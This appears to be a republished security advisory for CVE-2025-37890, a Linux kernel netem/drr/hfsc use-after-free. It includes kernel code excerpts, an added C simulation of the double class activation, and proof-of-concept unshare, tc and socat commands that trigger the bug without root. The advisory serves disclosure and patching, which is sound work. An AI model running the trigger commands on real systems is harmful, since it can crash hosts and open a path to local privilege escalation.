(CVE-2025-37890) Linux Kernel net_sched netem Double Enqueue Leading to Use-After-Free and Local Privilege Escalation
Aggregator summary (translated): the Linux kernel contains a high-severity vulnerability, CVE-2025-37890, affecting versions 5.0.1 through 6.15-rc4. It stems from a use-after-free involving the netem module and can be exploited by a local unprivileged attacker to escalate privileges; the fix is to upgrade past the specified commit. Published 2025-05-16, source: starlabs.sg.

Advisory May 16, 2025 By Gerrard Tai 3 min read

CVE: CVE-2025-37890

Affected Versions: Linux kernel 5.0.1 through 6.15-rc4

CVSS3.1: 7.8 (High) — CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

Product Linux Kernel (net_sched)
Vendor Linux Kernel
Severity High — a local unprivileged attacker may exploit this to achieve local privilege escalation
Affected Versions Linux kernel 5.0.1 through 6.15-rc4
CVE Identifier CVE-2025-37890
CVE Description A use-after-free in the Linux kernel net scheduler HFSC module via netem’s re-entrant enqueue behaviour leads to local privilege escalation
CWE Classification(s) CWE-416: Use After Free

CVSS4.0 Scoring System

Base Score: 8.5 Vector String: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Metric Value
Attack Vector (AV) Local
Attack Complexity (AC) Low
Attack Requirements (AT) None
Privileges Required (PR) Low
User Interaction (UI) None
Vulnerable System Confidentiality (VC) High
Vulnerable System Integrity (VI) High
Vulnerable System Availability (VA) High
Subsequent System Confidentiality (SC) None
Subsequent System Integrity (SI) None
Subsequent System Availability (SA) None

Technical Details

A use-after-free vulnerability in the Linux Kernel net scheduler subsystem can be exploited to achieve local privilege escalation. In the hfsc_enqueue routine, if the qdisc has a netem child, it is possible for the netem’s re-entrant behaviour to doubly activate a child class. This corrupts internal tracking, leading to a use-after-free vulnerability. We recommend upgrading past commit 37d9cf1a3ce35de3df6f7d209bfb1f50cf188cea.

The vulnerability lies in the netem_enqueue() function.

	if (skb2) {
		struct Qdisc *rootq = qdisc_root_bh(sch);
		u32 dupsave = q->duplicate; /* prevent duplicating a dup... */

		q->duplicate = 0;
		rootq->enqueue(skb2, rootq, to_free);                                // [1]
		q->duplicate = dupsave;
		skb2 = NULL;
	}

	qdisc_qstats_backlog_inc(sch, skb);

	cb = netem_skb_cb(skb);

	if (q->gap == 0 ||		/* not doing reordering */
	    q->counter < q->gap - 1 ||	/* inside last reordering gap */
	    q->reorder < get_crandom(&q->reorder_cor, &q->prng)) {
			
		// [...]

		tfifo_enqueue(skb, sch);                                             // [2]

When the netem qdisc tries to duplicate a packet, it enqueues the packet into the root qdisc ([1]). Subsequently, tfifo_enqueue() is called at [2], which increases the qdisc’s qlen.

A vulnerability exists when the netem qdisc is a child of a classful parent. For example, in drr_enqueue(), there is first a check ([3]) if the child qdisc is empty. Then, it enqueues the packet into the child qdisc ([4]). After the enqueue succeeds, it activates the newly active child ([5]).

	first = !cl->qdisc->q.qlen;                                              // [3]
	err = qdisc_enqueue(skb, cl->qdisc, to_free);                            // [4]
	if (unlikely(err != NET_XMIT_SUCCESS)) {
		if (net_xmit_drop_count(err)) {
			cl->qstats.drops++;
			qdisc_qstats_drop(sch);
		}
		return err;
	}

	if (first) {                                                             // [5]
		list_add_tail(&cl->alist, &q->active);
		cl->deficit = cl->quantum;
	}

When the parent (drr) enqueues a packet into an empty netem child, first is true at [3] and the packet is handed to netem. netem's duplication path re-enters the root qdisc, i.e. drr_enqueue(), at [1] before it has called tfifo_enqueue() at [2], so the netem's qlen is still 0 while the nested drr_enqueue() runs and first is true for the duplicate as well. Both enqueues succeed, and the class is activated twice at [5]: list_add_tail() links the same cl->alist node into the active list a second time.

This 're-entrant' behaviour is present in other classful qdiscs as well: hfsc_enqueue(), the path named in the CVE description, computes the same first = !cl->qdisc->q.qlen before the child enqueue and activates the class on it afterwards.

This bug can be used to corrupt a classful qdisc's internal tracking (a class node linked into the active list twice is not unlinked by a single removal, so the list keeps referencing the class after it is freed) and escalated into an LPE.
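The following is an added example, not kernel code and not the advisory's PoC: a user-space model of the re-entrant enqueue described above, using list helpers that mirror <linux/list.h>. The struct and field names are stand-ins for the kernel's drr/hfsc structures, and the `active` flag stands in for the active-class state the fix consults (an assumption for the model). It runs the unpatched and patched variants of the check at [5] and shows that the unpatched one activates the class twice and leaves the parent's active list pointing at the class after a single deactivation, which is the dangling reference a later dequeue would follow.

```c
/* Added example, not kernel code and not the advisory's PoC: a user-space model of
 * the re-entrant enqueue above. Field names are stand-ins for the kernel's drr/hfsc
 * structs, and 'active' stands in for the active state the fix checks (assumption). */
#include <stdbool.h>
#include <stdio.h>

struct list_head { struct list_head *next, *prev; };

static void init_list_head(struct list_head *h) { h->next = h->prev = h; }

/* Same pointer-update order as the kernel's __list_add(). */
static void list_add_tail(struct list_head *e, struct list_head *head)
{
	struct list_head *prev = head->prev;
	head->prev = e; e->next = head; e->prev = prev; prev->next = e;
}

static void list_del(struct list_head *e)
{
	e->prev->next = e->next; e->next->prev = e->prev;
}

struct qdisc;
typedef int (*enqueue_fn)(struct qdisc *sch, int pkt);
struct qdisc { enqueue_fn enqueue; unsigned int qlen; };

struct netem_qdisc {
	struct qdisc q;
	struct qdisc *root;	/* what qdisc_root_bh() returns for the child */
	int duplicate;		/* "netem duplicate 100%" as in the PoC */
};

struct cls {			/* one class of the classful parent */
	struct list_head alist;	/* node on the parent's active list */
	struct qdisc *child;
	int activations;	/* how many times [5] ran for this class */
	bool active;		/* the fix's "already active" state */
};

struct parent_qdisc {
	struct qdisc q;
	struct list_head active;
	struct cls *cl;
	bool fixed;		/* apply the patched check at [5] */
};

static int netem_enqueue(struct qdisc *sch, int pkt)
{
	struct netem_qdisc *q = (struct netem_qdisc *)sch;

	if (q->duplicate) {
		int dupsave = q->duplicate;
		q->duplicate = 0;
		q->root->enqueue(q->root, pkt);	/* [1]: parent re-entered while qlen is still 0 */
		q->duplicate = dupsave;
	}
	sch->qlen++;				/* [2]: tfifo_enqueue() raises qlen only now */
	return 0;
}

static int parent_enqueue(struct qdisc *sch, int pkt)
{
	struct parent_qdisc *p = (struct parent_qdisc *)sch;
	struct cls *cl = p->cl;
	bool first = !cl->child->qlen;				/* [3] */
	int err = cl->child->enqueue(cl->child, pkt);		/* [4] */

	if (err)
		return err;
	if (first && !(p->fixed && cl->active)) {		/* [5]: unpatched trusts 'first' alone */
		list_add_tail(&cl->alist, &p->active);
		cl->active = true;
		cl->activations++;
	}
	sch->qlen++;
	return 0;
}

struct outcome { int activations; unsigned int netem_qlen; bool head_still_points_at_class; };

/* Enqueue one packet via the parent, then deactivate the class once (as emptying or
 * deleting it would) and record whether the active list still references its node. */
static struct outcome run_scenario(bool fixed)
{
	struct netem_qdisc netem = { .q = { netem_enqueue, 0 }, .duplicate = 100 };
	struct cls cl = { .child = &netem.q };
	struct parent_qdisc root = { .q = { parent_enqueue, 0 }, .cl = &cl, .fixed = fixed };
	struct outcome out;

	init_list_head(&root.active);
	netem.root = &root.q;
	root.q.enqueue(&root.q, 1);
	list_del(&cl.alist);	/* one removal; after a double add the head still points at cl */

	out.activations = cl.activations;
	out.netem_qlen = netem.q.qlen;
	out.head_still_points_at_class = root.active.next == &cl.alist;
	return out;
}

static int count_activations(bool fixed) { return run_scenario(fixed).activations; }
static unsigned int netem_qlen_after(bool fixed) { return run_scenario(fixed).netem_qlen; }
static bool active_list_dangles(bool fixed) { return run_scenario(fixed).head_still_points_at_class; }

int main(void)
{
	for (int fixed = 0; fixed < 2; fixed++)
		printf("%s: activations=%d netem qlen=%u active list dangles=%s\n",
		       fixed ? "patched" : "unpatched", count_activations(fixed),
		       netem_qlen_after(fixed), active_list_dangles(fixed) ? "yes" : "no");
	return 0;
}
```

In the unpatched run the second list_add_tail() of the same node makes cl->alist point at itself, so list_del() rewrites only the node's own pointers and the head is left referencing it; in the real kernel that head is walked by the next dequeue after the class has been freed. The patched run activates once, and one removal leaves the list empty.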

Proof of Concept

The commands below need no root: unshare -rn creates a user and network namespace in which the caller holds CAP_NET_ADMIN, which is enough to configure qdiscs on the namespace's own loopback device. The datagram is sent with SO_PRIORITY 0x10001, which drr_classify() reads as classid 1:1 because its major number matches the root handle, so the packet lands in the netem child, whose 100% duplication re-enters drr_enqueue().

unshare -rn
ip link set dev lo up
tc qdisc add dev lo handle 1:0 root drr
tc class add dev lo classid 1:1 drr
tc qdisc add dev lo parent 1:1 handle 2:0 netem duplicate 100%
echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10001))

Fix

Upgrade past commit 37d9cf1a. The fix adds a check of the class's cl_nactive counter (its number of active children) alongside the first flag in hfsc_enqueue(), so a class that is already active is not inserted into the scheduler's active tracking a second time.

Credit

Gerrard Tai of STAR Labs SG Pte. Ltd.

Timeline

  • 2025-03-28 — Reported to Linux Kernel Security Team
  • 2025-05-16 — CVE-2025-37890 published

Source: https://starlabs.sg/advisories/25/25-37890/